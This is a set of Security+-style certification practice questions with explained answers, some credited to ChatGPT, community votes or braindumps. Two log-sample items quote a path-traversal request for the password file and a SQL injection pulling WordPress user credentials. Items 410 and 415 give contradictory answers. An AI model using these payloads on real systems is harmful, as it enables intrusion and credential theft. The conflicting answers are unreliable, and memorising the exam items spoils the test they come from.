Directory traversal: This attack attempts to access files or directories outside the web server's root directory by using relative path traversal sequences (..). In the provided URLs, the sequence ..2f represents the character sequence ../, which moves up one directory level in Unix-based systems (as %2f is the URL-encoded form of /).

Attack Pattern: The repeated use of ..2f in the page parameter (index.php?page=..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetcefpasswd) suggests an attempt to navigate several directory levels above the web server's root directory (/etcefpasswd). The attacker aims to access sensitive files or directories that are not intended to be publicly accessible.

In contrast, let’s briefly review the other options for clarity:

b. SQL injection: SQL injection involves manipulating SQL queries through input data, typically through forms or parameters, to execute unauthorized SQL commands. The provided URLs do not show typical SQL injection patterns.

c. API: APIs (Application Programming Interfaces) allow applications to communicate and interact with each other. The attack described does not involve API-related activities.

d. Request forgery: Request forgery involves tricking a user into performing actions without their knowledge or consent, often through maliciously crafted requests. This is not evident from the provided output, which focuses on repeated directory traversal attempts.

Therefore, a. Directory traversal is the best description of the attack based on the provided information, where the attacker is trying to navigate through directories beyond the web server’s intended access boundaries.

392
Q

An organization’s Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

a. Data protection officer
b. Data owner
c. Backup administrator
d. Data custodian
e. Internal auditor

A

d. Data custodian

Here’s why:

Data custodian: A data custodian is responsible for the storage, maintenance, and protection of data assets within an organization. This role involves implementing technical controls, such as backup procedures and data encryption, to ensure data integrity, availability, and confidentiality. Ensuring backups are properly maintained falls directly within the purview of a data custodian's responsibilities.

In contrast, let’s briefly review the other options for clarity:

a. Data protection officer: The Data Protection Officer (DPO) is typically responsible for overseeing an organization's data protection strategy and ensuring compliance with data protection regulations such as GDPR. While they have oversight, they may not directly implement technical controls like backups.

b. Data owner: The data owner is responsible for the governance of specific data elements, making decisions regarding access, usage, and overall data strategy. They are typically not involved in technical implementation such as backup management.

c. Backup administrator: While responsible for backups, a backup administrator's role is more focused on the operational aspects of backup systems and schedules rather than broader data protection and technical control implementation.

e. Internal auditor: Internal auditors review and assess an organization's processes and controls for compliance and efficiency but do not typically have responsibility for implementing day-to-day technical controls like data backups.

Therefore, d. Data custodian is the role that would typically encompass responsibilities for implementing technical controls to protect data and ensuring proper maintenance of backups within an organization.

393
Q

Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

a. White team
b. Purple team
c. Green team
d. Blue team
e. Red team

A

a. White team

▪ Red Team - The hostile or attacking team in a penetration test or incident
response exercise
▪ Blue Team - The defensive team in a penetration test or incident response
exercise
▪ White Team - Staff administering, evaluating, and supervising a penetration test
or incident response exercise

394
Q

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

a. Vulnerabilities with a CVSS score greater than 6.9.
b. Critical infrastructure vulnerabilities on non-IP protocols.
c. CVEs related to non-Microsoft systems such as printers and switches.
d. Missing patches for third-party software on Windows workstations and servers.

A

d. Missing patches for third-party software on Windows workstations and servers.

Here’s why:

Credentialed vs. uncredentialed scans: Credentialed scans have access to the credentials (such as usernames and passwords) of the systems being scanned. This allows the scanning tool to perform a more thorough inspection of the system, including checking for missing patches and updates on both operating system components and third-party software applications installed on the systems.

Missing patches for third-party software: Uncredentialed scans typically only check the network-facing services and ports, identifying vulnerabilities based on responses to network probes. They may miss vulnerabilities related to third-party software applications installed on the systems because they do not have the necessary access to inspect these applications and their patch levels.

In contrast, let’s briefly review the other options for clarity:

a. Vulnerabilities with a CVSS score greater than 6.9: Both credentialed and uncredentialed scans can detect vulnerabilities based on their CVSS scores, regardless of whether they exceed a specific threshold. However, the ability to detect specific missing patches for third-party software is more dependent on the credentials used in the scan.

b. Critical infrastructure vulnerabilities on non-IP protocols: Credentialed scans primarily focus on system-level vulnerabilities and may not specifically target critical infrastructure or non-IP protocols unless those protocols are directly accessible and part of the scan scope.

c. CVEs related to non-Microsoft systems such as printers and switches: Credentialed scans can detect CVEs (Common Vulnerabilities and Exposures) related to non-Microsoft systems if those systems are included in the scan scope and credentials are provided. However, the focus of this question is more on the detection of missing patches for third-party software.

Therefore, d. Missing patches for third-party software on Windows workstations and servers is the most likely scenario where a credentialed scan would provide more comprehensive results compared to an uncredentialed scan.

395
Q

A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

a. MAC filtering
b. Anti-malware
c. Translation gateway
d. VPN

A

d. VPN (Virtual Private Network)

Here’s why:

VPN: A VPN allows remote users or devices to securely connect to the internal network over the internet. It establishes an encrypted tunnel between the user's device and the internal network, ensuring that data transmitted over the internet is secure and private. VPNs typically require authentication, such as username/password or certificate-based authentication, ensuring that only authorized users or devices can access the internal network.

In contrast, let’s briefly review the other options for clarity:

a. MAC filtering: MAC filtering involves allowing or denying network access based on the MAC (Media Access Control) address of a device. While it can restrict access to some extent, MAC addresses can be spoofed, and it does not provide robust security against determined attackers or unauthorized users.

b. Anti-malware: Anti-malware software protects devices from malicious software such as viruses, trojans, and worms. While important for endpoint security, it does not directly prevent unauthorized access to the internal network.

c. Translation gateway: This term is less commonly used in standard network security contexts. If it refers to a specific type of network gateway, it would need more context, but typically, it doesn't directly prevent unauthorized access like a VPN does.

Therefore, d. VPN is the most appropriate solution for ensuring secure and authenticated remote access to the internal network, preventing unauthorized access effectively.

396
Q

A host was infected with malware. During the incident response, Joe, a user, reported that he did not receive any emails with links, but he had been browsing the internet all day. Which of the following would MOST likely show where the malware originated?

a. The DNS logs
b. The web server logs
c. The SIP traffic logs
d. The SNMP logs

A

a. The DNS logs

DNS logs can show the domain names that Joe’s computer resolved during his browsing session. This can help identify any suspicious or malicious domains that were accessed, which could have been the source of the malware.

Here’s why the other options are less relevant in this context:

The web server logs: These logs are maintained by the web servers Joe visited and would not be available on Joe's machine or the organization's network logs. They also do not provide a comprehensive list of all sites visited by Joe.

The SIP traffic logs: SIP (Session Initiation Protocol) traffic logs are related to VoIP (Voice over IP) and are not relevant to web browsing activity.

The SNMP logs: SNMP (Simple Network Management Protocol) logs are used for network management and monitoring and do not provide information about web browsing activity.

Therefore, the DNS logs would most likely show where the malware originated by identifying the domains Joe’s computer accessed while browsing the internet.

397
Q

A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the key?

a. .pfx
b. .csr
c. .pvk
d. .cer

A

d. .cer

Here’s why:

.cer (Certificate): A .cer file typically contains a public key and is often used for sharing certificates, including public keys issued by a Certificate Authority (CA). It can be shared securely as it only contains the public key information, which is intended to be publicly accessible.

Let’s briefly review the other options for clarity:

a. .pfx (Personal Information Exchange): A .pfx file contains both the public and private key pair along with any associated certificates. It is used for securely transferring certificates and private keys, but it includes sensitive information and is not suitable for sharing only the public key.

b. .csr (Certificate Signing Request): A .csr file is used to request a certificate from a Certificate Authority (CA) and contains information about the applicant and the public key. It is not used for sharing a public key directly.

c. .pvk (Private Key): A .pvk file contains a private key and is used for securely storing and transferring private keys. It is not appropriate for sharing a public key as it contains sensitive information.

Therefore, d. .cer is the correct file format to choose when sharing a public key for secure communication with a third party.

398
Q

A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following should the administrator consider?

a. Hashing
b. Salting
c. Lightweight cryptography
d. Steganography

A

b. Salting

Here’s why salting is the appropriate choice:

Salting: Salting involves adding a unique, random value (salt) to each password before hashing it. This salt value ensures that even if two users have the same password, their hashed passwords will be different because of the unique salt. Salting prevents attackers from precomputing hashes (as in rainbow tables) for common passwords across all users, as each user's salt modifies the resulting hash uniquely.

Let’s briefly review the other options for clarity:

a. Hashing: Hashing converts plaintext passwords into a fixed-size string of characters using a cryptographic hash function. While hashing is essential for storing passwords securely, it alone does not prevent rainbow table attacks without the addition of unique salts.

c. Lightweight cryptography: This term generally refers to cryptographic algorithms designed for resource-constrained environments. While important for efficiency in certain contexts, it does not specifically address rainbow table attacks on stored passwords.

d. Steganography: Steganography involves hiding information within other non-secret data. It is not relevant for protecting passwords in a database against rainbow table attacks.
399
Q

A company wants to deploy PKI on its internet-facing website. The applications that are currently deployed are:

*www.company.com (main website)
*contactus.company.com (for locating a nearby location)
*quotes.company.com (for requesting a price quote)

The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same naming conventions, such as store.company.com. Which of the following certificate types would BEST meet the requirements?

a. SAN
b. Wildcard
c. Extended validation
d. Self-signed

A

b. Wildcard certificate.

Here’s why:

Wildcard Certificate: A wildcard certificate is designed to secure a domain and all its subdomains. In this case, a wildcard certificate for *.company.com would secure www.company.com, contactus.company.com, quotes.company.com, and any future subdomains like store.company.com. This is particularly useful when you have multiple subdomains under the same domain (company.com in this case) and want a single certificate to cover them all.

SAN (Subject Alternative Name) Certificate: While SAN certificates can also cover multiple domain names (including different domains altogether), they require listing each domain explicitly in the certificate. This can become cumbersome if many subdomains are involved, unlike a wildcard certificate which covers all subdomains automatically.

Extended Validation (EV) Certificate: EV certificates provide higher validation standards but do not inherently cover multiple subdomains or wildcard domains. They focus more on verifying the legitimacy and identity of the organization behind the domain, rather than the number of subdomains covered.

Self-signed Certificate: Self-signed certificates are not suitable for internet-facing websites as they are not trusted by default by browsers and would trigger security warnings for users.

Therefore, for the company wanting to secure company.com and all its subdomains (current and future), a wildcard certificate (*.company.com) is the most appropriate choice among the options provided.

400
Q

A security analyst is concerned about traffic initiated to the dark web from the corporate LAN. Which of the following networks should the analyst monitor?

a. SFTP
b. AIS
c. Tor
d. IoC

A

c. Tor.

Tor (The Onion Router): Tor is a network protocol used for anonymous communication over the internet. It is commonly associated with accessing the dark web, which consists of websites and services not indexed by traditional search engines and often used for illicit purposes.

Here’s why the other options are not correct:

SFTP (Secure File Transfer Protocol): SFTP is a secure protocol used for transferring files securely over a network. It is not directly related to accessing the dark web.

AIS (Automated Information System): AIS typically refers to systems that collect, process, store, display, and disseminate information in an automated manner. It does not relate to accessing the dark web.

IoC (Indicators of Compromise): IoC refers to evidence that a system has been breached or compromised. It involves monitoring for signs of security breaches rather than specific network traffic related to accessing the dark web.

Therefore, the correct network that the security analyst should monitor for concerns related to traffic initiated to the dark web from the corporate LAN is c. Tor. This involves identifying and potentially monitoring Tor network traffic to detect any unauthorized or suspicious activities related to accessing the dark web from within the corporate network.

401
Q

A security analyst is reviewing logs on a server and observes the following output:

01/01/2020 03:33:23 admin attempted login with password sneak
01/01/2020 03:33:23 admin attempted login with password sneaked
01/01/2020 03:33:23 admin attempted login with password sneaker
01/01/2020 03:33:23 admin attempted login with password sneer
01/01/2020 03:33:23 admin attempted login with password sneeze
01/01/2020 03:33:23 admin attempted login with password sneezy

Which of the following is the security analyst observing?

a. A rainbow table attack
b. A password-spraying attack
c. A dictionary attack
d. A keylogger attack

A

c. A dictionary attack.

Here’s why:

Dictionary Attack: In a dictionary attack, the attacker uses a list of commonly used passwords or words from a dictionary to attempt to gain unauthorized access to a system. The log entries show multiple login attempts with variations of the password "sneak" (like "sneaked", "sneaker", "sneer", "sneeze", "sneezy"), indicating that the attacker is systematically trying different permutations of a known word or pattern.

Rainbow Table Attack: A rainbow table attack involves precomputed hashes of commonly used passwords to quickly crack hashed passwords. It is not evident in the log entries provided, as the attempts are with different variations of a single word rather than hashed values.

Password-Spraying Attack: Password-spraying involves attempting a few commonly used passwords against many accounts. It typically targets multiple usernames with a few common passwords rather than trying variations of a single password.

Keylogger Attack: A keylogger attack involves malware or hardware that captures keystrokes entered by users, including passwords. There is no indication of keylogging in the log entries provided.

Therefore, based on the pattern of login attempts with variations of the password “sneak”, the activity described aligns with a dictionary attack where the attacker is systematically trying different variations of a word in an attempt to guess the correct password and gain unauthorized access.

402
Q

A company is launching a website in a different country in order to capture user information that a marketing business can use. The company itself will not be using the information. Which of the following roles is the company assuming?

a. Data owner
b. Data processor
c. Data steward
d. Data collector

A

d. Data collector.

Here’s why:

Data Collector: A data collector is an entity that collects personal data directly from individuals or through other sources. In this case, the company is launching a website in a different country to capture user information. Although the company itself will not be using the information, it is gathering (collecting) this data on behalf of a marketing business. The primary function here is to gather the data from users.

Data Owner: The data owner is typically the individual or organization that has ultimate control over the data, including its use and disclosure. In this scenario, it's not explicitly stated that the company retains ownership or control over the data after collection.

Data Processor: A data processor processes personal data on behalf of the data controller (owner) based on their instructions. Since the company is not processing the data for its own purposes but rather collecting it for another entity (the marketing business), it does not fit the definition of a data processor.

Data Steward: A data steward is responsible for managing and maintaining the quality, security, and use of data within an organization. This role focuses more on governance and ensuring that data is handled correctly within the organization, which differs from the primary function of collecting data from external sources.

Therefore, based on the description provided, the company assuming the role of gathering user information for a marketing business is acting as a data collector.

403
Q

An organization would like to remediate the risk associated with its cloud service provider not meeting its advertised 99.999% availability metrics. Which of the following should the organization consult for the exact requirements for the cloud provider?

a. SLA
b. BPA
c. NDA
d. MOU

A

a. SLA (Service Level Agreement)

Here’s why:

SLA (Service Level Agreement): An SLA is a contract between a service provider (in this case, the cloud service provider) and the customer (the organization). It specifies the level of service that the provider agrees to offer, including metrics such as availability, performance, uptime guarantees, and response times. The SLA outlines what happens if the provider fails to meet these metrics, typically including remedies such as service credits or penalties.

BPA (Business Partnership Agreement): A BPA typically outlines the broader terms and conditions of a business relationship but does not usually specify detailed service-level metrics like availability.

NDA (Non-Disclosure Agreement): An NDA is a legal contract that protects confidential information shared between parties and is not related to service-level requirements.

MOU (Memorandum of Understanding): An MOU is a formal agreement between parties outlining their mutual intentions and expectations, but it does not typically include specific service-level metrics or remedies for non-compliance.

Therefore, to understand the exact requirements for the cloud provider’s advertised availability metrics and to remediate the risk associated with non-compliance, the organization should refer to the SLA (Service Level Agreement). This document will provide clarity on the agreed-upon service levels and the recourse available if those levels are not met.

404
Q

Which of the following secure application development concepts aims to block verbose error messages from being shown in a user’s interface?

a. OWASP
b. Obfuscation/camouflage
c. Test environment
d. Prevention of information exposure

A

d. Prevention of information exposure.

Here’s why:

Prevention of Information Exposure: This concept involves ensuring that sensitive information, such as verbose error messages that could potentially provide attackers with useful information about the application or its environment, is not exposed to users or unauthorized parties. By minimizing or controlling the amount of information exposed through error messages, developers can reduce the risk of attackers exploiting such information to launch targeted attacks.

Let’s briefly cover the other options to clarify:

OWASP: OWASP (Open Web Application Security Project) is a nonprofit organization focused on improving software security. While OWASP provides guidelines and resources for secure application development, it is not specifically focused on blocking verbose error messages.

Obfuscation/Camouflage: Obfuscation and camouflage techniques are used to make code or data difficult to understand or analyze, which can help in protecting against reverse engineering or unauthorized access to sensitive information. However, they do not directly address the issue of verbose error messages in user interfaces.

Test Environment: A test environment is where developers test their applications before deployment to ensure functionality and security. It is not directly related to blocking verbose error messages in a user interface.

Therefore, d. Prevention of information exposure is the concept that specifically addresses the secure development practice of ensuring that detailed error messages and other sensitive information are not exposed to users or attackers, thus minimizing security risks.

405
Q

If a current private key is compromised, which of the following would ensure it cannot be used to decrypt all historical data?

a. Perfect forward secrecy
b. Elliptic-curve cryptography
c. Key stretching
d. Homomorphic encryption

A

a. Perfect forward secrecy.

Here’s why:

Perfect Forward Secrecy (PFS): PFS is a property of key-agreement protocols that ensures that session keys derived from a long-term key (such as a private key) are not compromised even if the long-term key is compromised at a later time. In other words, if a current private key is compromised and PFS is implemented, the compromise does not affect the confidentiality of past communications. Each session key is unique and not derived directly from the long-term private key, so compromising the long-term key does not compromise past session keys.

Elliptic-curve Cryptography (ECC): ECC is an encryption method that uses elliptic curves to provide security. While it offers advantages such as smaller key sizes for equivalent security levels compared to RSA, it does not inherently prevent decryption of historical data if the private key is compromised.

Key Stretching: Key stretching techniques (like PBKDF2, bcrypt, or scrypt) are used to make keys derived from passwords more resistant to brute-force attacks. They do not directly address the issue of protecting historical data if a private key is compromised.

Homomorphic Encryption: Homomorphic encryption allows computations to be performed on encrypted data without decrypting it. It does not directly address the issue of preventing decryption of historical data if a private key is compromised.

Therefore, a. Perfect forward secrecy is the concept that ensures a compromised current private key cannot be used to decrypt all historical data, making it a crucial feature in secure communications protocols, particularly in scenarios where long-term keys might be compromised.

406
Q

An organization has expanded its operations by opening a remote office. The new office is fully furnished with office resources to support up to 50 employees working on any given day. Which of the following VPN solutions would BEST support the new office?

a. Always-on
b. Remote access
c. Site-to-site
d. Full tunnel

A

c. Site-to-site VPN.

Here’s why:

Site-to-site VPN: This type of VPN establishes a secure connection between two or more physical locations (in this case, between the main office and the remote office). It allows all network traffic between the two sites to be encrypted and transmitted securely over the internet. Site-to-site VPNs are ideal for connecting entire networks, such as connecting the main office network to the network at the remote office with up to 50 employees.

Always-on VPN: An always-on VPN is a type of VPN configuration where the VPN connection is automatically established whenever a device connects to the internet. It is suitable for individual devices rather than connecting entire office networks.

Remote access VPN: A remote access VPN allows individual users to connect securely to a corporate network from remote locations. It is more suitable for mobile employees or individuals working from home rather than connecting an entire office.

Full tunnel VPN: A full tunnel VPN directs all traffic from a client device through the VPN tunnel to the corporate network, regardless of whether the traffic is destined for resources on the corporate network or the internet. It is a configuration option rather than a type of VPN solution like site-to-site or remote access VPN.

Therefore, c. Site-to-site VPN is the best choice for connecting the new remote office with up to 50 employees to the main office network securely and efficiently. It provides a seamless and secure connection between the two office locations, enabling access to shared resources and applications as if they were locally connected.

407
Q

Which of the following scenarios BEST describes a risk reduction technique?

a. A security control objective cannot be met through a technical change, so the company purchases insurance and is no longer concerned about losses from data breaches.
b. A security control objective cannot be met through a technical change, so the company implements a policy to train users on a more secure method of operation.
c. A security control objective cannot be met through a technical change, so the company performs regular audits to determine if violations have occurred.
d. A security control objective cannot be met through a technical change, so the Chief Information Officer decides to sign off on the risk.

A

b. A security control objective cannot be met through a technical change, so the company implements a policy to train users on a more secure method of operation.

Here’s why:

Training Users on Secure Methods: This approach addresses the inability to meet a security control objective through technical means by focusing on human behavior and awareness. By educating users on more secure methods of operation, such as proper handling of data, recognizing phishing attempts, or following secure procedures, the organization reduces the likelihood of security incidents caused by human error or ignorance.

Let’s briefly cover the other options to clarify:

Purchasing Insurance: While purchasing insurance can mitigate financial losses from data breaches, it does not directly reduce the risk associated with the security control objective itself. It is more of a risk transfer mechanism rather than a risk reduction technique.

Performing Regular Audits: Audits help in detecting violations or non-compliance but do not actively reduce the risk associated with the security control objective. They are more about monitoring and ensuring adherence to policies rather than directly mitigating risks.

Signing Off on the Risk: Signing off on the risk (option d) implies accepting the risk rather than actively reducing it. It does not involve implementing controls or measures to decrease the likelihood or impact of a security incident.

Therefore, b. Implementing a policy to train users on a more secure method of operation is the option that represents a proactive risk reduction technique by addressing the human element and enhancing security awareness and practices within the organization.

408
Q

Which of the following social engineering attacks BEST describes an email that is primarily intended to mislead recipients into forwarding the email to others?

a. Hoaxing
b. Pharming
c. Watering-hole
d. Phishing

A

a. Hoaxing.

Here’s why:

Hoaxing: Hoaxing involves spreading false information or rumors through various means, including emails, with the intent to deceive and mislead recipients. In the context of emails, hoax emails often encourage recipients to forward the message to others, typically by appealing to emotions, spreading false news, or promoting chain letters.

Let’s briefly cover the other options to clarify:

Pharming: Pharming is a cyber attack where malicious code is used to redirect a website's traffic to a fake website without the user's knowledge. It typically involves DNS hijacking or malware and is not directly related to forwarding misleading emails.

Watering-hole: A watering-hole attack involves compromising websites that a targeted group of individuals is likely to visit and injecting them with malware. It aims to infect visitors with malware rather than forwarding misleading emails.

Phishing: Phishing is a social engineering attack where attackers send deceptive emails or messages pretending to be from a reputable source to trick recipients into revealing sensitive information or clicking on malicious links. While phishing emails can sometimes instruct recipients to forward the message, their primary goal is usually to deceive recipients into taking actions like clicking links or providing credentials.

Therefore, a. Hoaxing is the social engineering attack that specifically involves emails intended to mislead recipients into forwarding the email to others, often perpetuating false information or initiating chain messages.

409
Q

Which of the following will provide the BEST physical security countermeasures to stop intruders? (Choose two.)

a. Alarms
b. Signage
c. Lighting
d. Access control vestibules
e. Fencing
f. Sensors

A

(Community : DE 100%)
d. Access control vestibules
e. Fencing

Intruders can be detected by strong lightning, alarms, and sensors. However, these measures alone don’t physically prevent intruders from bypassing security. Signage may discourage intruders but doesn’t physically stop them. Access control vestibules and fences can physically prevent intruders from accessing valuable assets and restricted areas

ChatGPT : DE
d. Access control vestibules: Also known as mantraps, these are secure entryways that use two sets of interlocking doors to prevent unauthorized access. They provide a high level of security by ensuring that only authorized personnel can enter the premises.

e. Fencing: Fencing acts as a physical barrier to entry, making it more difficult for intruders to gain access to the property. It can also be combined with other security measures like barbed wire, sensors, and cameras to enhance overall security.

These two countermeasures provide substantial physical barriers and control mechanisms to effectively deter and stop intruders from gaining unauthorized access.

410
Q

An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the following should be the first lines of defense against such an attack? (Choose two.)

a. MAC filtering
b. Zero trust segmentation
c. Network access control
d. Access control vestibules
e. Guards
f. Bollards

A

(Community : DE 49%, CD 49%)

Choose CD.

ChatGTP
c. Network access control
d. Access control vestibules
Explanation:

Network Access Control (NAC):
    Purpose: NAC systems enforce security policy on devices seeking to access network resources. They can block unauthorized devices, such as a rogue Kali Linux box, from gaining network access.
    Benefit: This helps prevent unauthorized devices from communicating over the network, thus mitigating the risk of data breaches and other security threats.

Access Control Vestibules:
    Purpose: These are physical security measures that control and monitor the entry of personnel into a facility. Often referred to as "mantraps," these vestibules ensure that only authorized individuals gain access to secure areas.
    Benefit: This reduces the risk of unauthorized individuals physically entering the premises and deploying malicious devices.

Why the other options are less suitable as first lines of defense:

a. MAC filtering:
    While useful, MAC filtering can be bypassed by spoofing the MAC address. It is more of a secondary measure rather than a primary defense against physical intrusion and rogue devices.

b. Zero trust segmentation:
    This is an excellent internal network security strategy but does not address the physical aspect of preventing unauthorized device access at the network level.

e. Guards:
    While security guards are important, they are not as effective on their own as access control vestibules for systematically ensuring that unauthorized individuals do not gain access to secure areas.

f. Bollards:
    Bollards are designed to prevent vehicular access and do not directly prevent individuals from physically entering a facility and deploying a rogue device.

By focusing on network access control to block unauthorized devices and access control vestibules to prevent unauthorized physical access, the organization can effectively mitigate the risk of hackers deploying a remotely accessible Kali Linux box.

(Braindump : A. Zero trust segmentation c. Network access control)

411
Q

An employee used a corporate mobile device during a vacation. Multiple contacts were modified in the device during the employee’s vacation. Which of the following attack methods did an attacker use to insert the contacts without having physical access to the device?

a. Jamming
b. Bluejacking
c. Disassociation
d. Evil twin

A

b. Bluejacking.

Here’s why:

Bluejacking: Bluejacking is a relatively harmless attack where an attacker sends unsolicited messages or contacts over Bluetooth to nearby Bluetooth-enabled devices. The goal is typically to send spam or messages rather than maliciously modify contacts, but in some cases, it could involve adding or modifying contacts if the device settings allow it.

Let’s briefly cover the other options to clarify:

Jamming: Jamming involves intentionally disrupting wireless communication signals (such as Wi-Fi or Bluetooth) to prevent normal operation. It does not involve modifying contacts or inserting data into devices.

Disassociation: Disassociation typically refers to the process of disconnecting a device from a wireless network. It is not related to inserting or modifying contacts on a mobile device.

Evil twin: An evil twin attack involves creating a rogue wireless access point (Wi-Fi hotspot) that masquerades as a legitimate one to trick users into connecting. It does not directly involve inserting or modifying contacts on a mobile device.

Therefore, b. Bluejacking is the attack method where the attacker could have sent or modified contacts on the corporate mobile device via Bluetooth without physically accessing the device, assuming the device was susceptible to such actions over Bluetooth connections.

412
Q

A security administrator wants to implement a program that tests a user’s ability to recognize attacks over the organization’s email system. Which of the following would be best suited for this task?

a. Social media analysis
b. Annual information security training
c. Gamification
d. Phishing campaign

A

d. Phishing campaign.

Here’s why:

Phishing Campaign: A phishing campaign involves sending simulated phishing emails to employees to test their awareness and ability to identify phishing attacks. These emails are designed to mimic real phishing attempts, but without malicious intent, aiming to educate users on how to recognize and respond to phishing emails correctly.

Let’s briefly cover the other options to clarify:

Social Media Analysis: Social media analysis involves monitoring and analyzing social media platforms for security threats or information leakage related to an organization. It does not directly test a user's ability to recognize email-based attacks.

Annual Information Security Training: While annual information security training is essential for educating employees on various security topics, including phishing, it does not specifically simulate real phishing attacks to test immediate recognition and response capabilities.

Gamification: Gamification involves incorporating game-like elements (such as points, rewards, and competition) into training programs to engage and motivate participants. While it can enhance training effectiveness, it typically focuses on learning retention and engagement rather than testing specific skills like recognizing email attacks.

Therefore, d. Phishing campaign is the most appropriate choice for actively testing and improving users’ ability to identify and respond to phishing attacks via the organization’s email system. It provides a practical simulation of real-world threats to enhance awareness and readiness among employees.

413
Q

A security analyst is reviewing packet capture data from a compromised host on the network. In the packet capture, the analyst locates packets that contain large amounts of text. Which of the following is most likely installed on the compromised host?

a. Keylogger
b. Spyware
c. Trojan
d. Ransomware

A

a. Keylogger

Here’s why:

Keylogger: Keyloggers are malicious programs designed to record keystrokes made by a user on a computer. They capture all keystrokes entered, including text typed into documents, web forms, passwords, and other sensitive information. If the packet capture data includes large amounts of text from various sources (such as documents, emails, or chat messages), it suggests that a keylogger is actively capturing and transmitting this information.

Spyware: Spyware is a broader category of malicious software that includes keyloggers but also encompasses other types of software designed to monitor and gather information about a user's activities without their knowledge. However, keyloggers specifically target and capture keystrokes, which aligns with the description provided in the scenario.

Trojan: Trojans are malicious programs disguised as legitimate software. While Trojans can include keyloggers or spyware functionality, the focus on capturing and transmitting text data specifically points towards a keylogger rather than a Trojan in general.

Ransomware: Ransomware encrypts files on a computer and demands payment for decryption. It typically does not involve capturing large amounts of text data but rather focuses on locking access to files or systems.

Therefore, a. Keylogger is the most likely software installed on the compromised host based on the packet capture data showing large amounts of captured text.

414
Q

An organization needs to implement more stringent controls over administrator/root credentials and service accounts. Requirements for the project include:

*Check-in/checkout of credentials
*The ability to use but not know the password
*Automated password changes
*Logging of access to credentials

Which of the following solutions would meet the requirements?

a. OAuth 2.0
b. Secure Enclave
c. A privileged access management system
d. An OpenID Connect authentication system

A

(Community C 100%)

C. A privileged access management system
Privileged access management (PAM, sometimes called privileged
account management) allows an organization to apply more stringent
security controls over accounts with elevated privileges, such as
administrator or root-level accounts.

Some capabilities of PAM are:

-Allow users to access the privileged account without knowing
the password
-Automatically change privileged account passwords
periodically
-Limit the time users can use the privileged account
-Allow users to check out credentials
-Log all access of credentials

ChatGPT
c. A privileged access management (PAM) system

Here’s how a PAM system aligns with each requirement:

Check-in/checkout of credentials: A PAM system provides a secure vault where privileged credentials (such as administrator/root credentials and service account passwords) are stored. Access to these credentials can be managed through check-in and checkout mechanisms, ensuring that credentials are only accessible when needed and are returned after use.

The ability to use but not know the password: PAM systems typically provide mechanisms such as session management and password injection that allow users to access systems without revealing the actual passwords. Instead, credentials are managed and rotated automatically by the PAM system.

Automated password changes: PAM systems can automate the rotation and changing of passwords according to policies and schedules defined by the organization. This ensures that passwords are regularly updated to enhance security.

Logging of access to credentials: PAM systems maintain detailed audit logs of all access and actions performed using privileged credentials. This includes logging who accessed which credentials, when, and for what purpose, providing accountability and traceability.

Let’s briefly cover the other options to clarify why they are not as suitable:

OAuth 2.0: OAuth 2.0 is an authorization framework that allows third-party applications to obtain limited access to an HTTP service. It is not designed for managing privileged credentials and does not provide the comprehensive controls and auditing capabilities required for administrator/root credentials and service accounts.

Secure Enclave: A secure enclave is a hardware-based security feature that provides isolated execution environments for sensitive computations. While it enhances security for specific tasks, it does not directly address the management and control of privileged credentials as comprehensively as a PAM system.

An OpenID Connect authentication system: OpenID Connect is an authentication protocol that allows for the authorization of clients to access protected resources. It focuses on user authentication and identity management, rather than managing privileged credentials and enforcing strict controls over administrator/root accounts and service accounts.

Therefore, c. A privileged access management (PAM) system is the solution that best meets the requirements outlined for implementing stringent controls over administrator/root credentials and service accounts within the organization.

415
Q

A systems analyst is responsible for generating a new digital forensics chain-of-custody form. Which of the following should the analyst include in this documentation? (Choose two).

a. The order of volatility
b. A forensics NDA
c. The provenance of the artifacts
d. The vendor’s name
e. The date and time
f. A warning banner

A

(Braindump : c. The provenance of the artifacts e. The date and time)
The systems analyst should include the date and time and the provenance of the artifacts in the digital forensics chain-of-custody form. The date and time are important for tracking when the evidence was collected and when it was transferred between individuals or organizations. The provenance of the artifacts is also important for tracking the chain of custody and ensuring that the evidence has not been tampered with.

The order of volatility is a concept used in digital forensics to determine the order in which volatile data should be collected. A forensics NDA is a non-disclosure agreement that is used to protect sensitive information during a digital forensics investigation. The vendor’s name is not typically included in a digital forensics chain-of-custody form. A warning banner is a message that is displayed to users before they log in to a system to warn them about the consequences of unauthorized access.

a. The order of volatility

The order of volatility refers to the sequence in which volatile data (data that is likely to change or be lost quickly) should be collected and preserved during the forensic investigation. This ensures that the most volatile data, which may provide crucial evidence, is collected first.

c. The provenance of the artifacts

Provenance refers to the origin or source of the artifacts collected during the investigation. It includes information such as where and how the artifacts were discovered, who collected them, and under what circumstances. Documenting provenance is critical for establishing the authenticity and reliability of the evidence in legal proceedings.

Let’s briefly cover the other options to clarify why they are not typically included in a digital forensics chain-of-custody form:

b. A forensics NDA: While a Non-Disclosure Agreement (NDA) is important for protecting confidential information and ensuring confidentiality among parties involved in the investigation, it is not typically part of the chain-of-custody form itself. NDAs are separate legal agreements that may be signed between parties involved in the investigation.

d. The vendor's name: Unless the investigation involves external vendors or service providers who are directly handling or assisting with the forensic process, the vendor's name is not typically relevant to include in the chain-of-custody form.

e. The date and time: While the date and time are crucial for documenting when artifacts were collected or transferred, they are usually included as part of the chain-of-custody process itself rather than being explicitly listed in the form.

f. A warning banner: A warning banner is a notification displayed on systems to inform users of the monitoring or security policies in place. While important for system usage and awareness, it is not directly related to documenting the chain-of-custody for forensic artifacts.

Therefore, the systems analyst should focus on including a. The order of volatility and c. The provenance of the artifacts in the digital forensics chain-of-custody form to ensure comprehensive documentation and integrity of the forensic investigation process.

416
Q

A security analyst reviews web server logs and notices the following line:

104.35.45.53 - - [22/May/2020:07:00:58 +0100] “GET /wordpress/wp-content/plugins/custom_plugin/check_user/php?userid=1 UNION ALL SELECT user_login, user,_pass, user_email from wp_users== HTTP/1.1” 200 1072 “http://www.example.com/wordpress/wp-admin/”

Which of the following vulnerabilities is the attacker trying to exploit?

a. SSRF
b. CSRF
c. XSS
